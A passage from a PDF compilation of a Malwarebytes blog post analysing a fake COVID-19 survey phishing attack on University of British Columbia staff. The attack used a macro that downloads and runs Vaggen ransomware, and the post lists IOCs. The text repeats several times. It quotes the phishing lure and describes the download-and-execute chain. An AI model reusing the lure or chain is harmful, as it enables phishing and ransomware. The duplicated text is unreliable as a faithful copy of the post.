threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 259 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 260 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 261 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 262 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 263 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 264 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 265 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 266 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nThis post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.\r\nIn recent weeks, we’ve observed a number of phishing attacks against universities worldwide which we attributed\r\nto the Silent Librarian APT group. On October 19, we identified a new phishing document targeting staff at the\r\nUniversity of British Columbia (UBC) with a fake COVID-19 survey.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 267 of 3467\n\nHowever, this attack and motives are different than the ones previously documented. The survey is a malicious\r\nWord document whose purpose is to download ransomware and extort victims to recover their encrypted files.\r\nOn discovery, we got in touch with UBC to report our findings. They were already aware of this phishing\r\ncampaign and were kind enough to share more information with us about the incident. Ultimately, this attack was\r\nnot successful due to the rapid response of the UBC cybersecurity team.\r\nMandatory COVID-19 survey distributed to targeted recipients\r\nThe attacker created an email address with the mailpoof.com service in order to register accounts with Box.net\r\nand DropBox. Rather than directly sending the fake survey via email, the attacker uploaded the document onto\r\nBox and DropBox and used the share functionality from these platforms to distribute it.\r\nThis was probably done to evade spam and phishing filters that would have blocked messages coming from a\r\nnewly registered email address with a low reputation. In comparison, it is much more difficult to detect spam from\r\nfile sharing services without creating a number of false positives.\r\nThe attacker claimed to be a manager and added the following comment in the file sharing invitation (shared with\r\nus by UBC):\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 268 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 269 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 270 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 271 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 272 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 273 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 274 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 275 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 276 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 277 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 278 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 279 of 3467\n\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 280 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 281 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 282 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 283 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 284 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 285 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 286 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 287 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 288 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 289 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nThis post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.\r\nIn recent weeks, we’ve observed a number of phishing attacks against universities worldwide which we attributed\r\nto the Silent Librarian APT group. On October 19, we identified a new phishing document targeting staff at the\r\nUniversity of British Columbia (UBC) with a fake COVID-19 survey.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 290 of 3467\n\nHowever, this attack and motives are different than the ones previously documented. The survey is a malicious\r\nWord document whose purpose is to download ransomware and extort victims to recover their encrypted files.\r\nOn discovery, we got in touch with UBC to report our findings. They were already aware of this phishing\r\ncampaign and were kind enough to share more information with us about the incident. Ultimately, this attack was\r\nnot successful due to the rapid response of the UBC cybersecurity team.\r\nMandatory COVID-19 survey distributed to targeted recipients\r\nThe attacker created an email address with the mailpoof.com service in order to register accounts with Box.net\r\nand DropBox. Rather than directly sending the fake survey via email, the attacker uploaded the document onto\r\nBox and DropBox and used the share functionality from these platforms to distribute it.\r\nThis was probably done to evade spam and phishing filters that would have blocked messages coming from a\r\nnewly registered email address with a low reputation. In comparison, it is much more difficult to detect spam from\r\nfile sharing services without creating a number of false positives.\r\nThe attacker claimed to be a manager and added the following comment in the file sharing invitation (shared with\r\nus by UBC):\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can 